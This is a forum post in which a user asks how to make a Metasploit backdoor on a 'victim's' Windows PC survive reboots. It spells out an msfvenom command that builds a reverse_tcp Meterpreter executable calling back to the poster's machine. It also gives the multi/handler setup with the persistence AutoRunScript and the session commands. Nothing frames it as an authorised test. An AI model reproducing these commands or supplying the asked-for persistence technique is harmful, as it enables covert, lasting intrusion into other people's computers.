Hello guys .I actually need some guidance on this.I got few questions that i believe you can answer them easily.So,after i use msf and making a payload with a reversal connection to my computer and i inject it to the victims pc,i wonder if its possible to leave a permanent backdoor there.I mean,every time after the exe has runned ,i try to reconnect with the same way and it just need the exe to run again in order to connect back.I managed to leave a backdoor but when i restart the "Victim's" computer it needs the exe to run again manually ! A quick show of what i did ...
msfvenom -p windows/meterpreter/reverse_tcp LHOST=myip LPORT=my port -f exe > Hey.exe
After that i run the console using the exploit multi/handler
use multi/handler
....set PAYLOAD windows/meterpreter/reverse_tcp
after that i am setting the payload!
and now,i run an AutoScript.....
set AutoRunScript persistence
....
set ExitOnSession false...
After i run this code,as i told you before it needs the exe to Run ... Ok just say i am in and got the connection is done...
meterpreter> Sessions
>Background
sessions (to see if its done)
sessions -i 1 for expample
background ....
If i do this,while the victim's computer is on i can easily backdoor,after he restarts,the connection needs the handler again...
So here is the question....
*Can i permanent set a payload (actually the RunScript already does) and try to enter after a reboot/shutdown or else?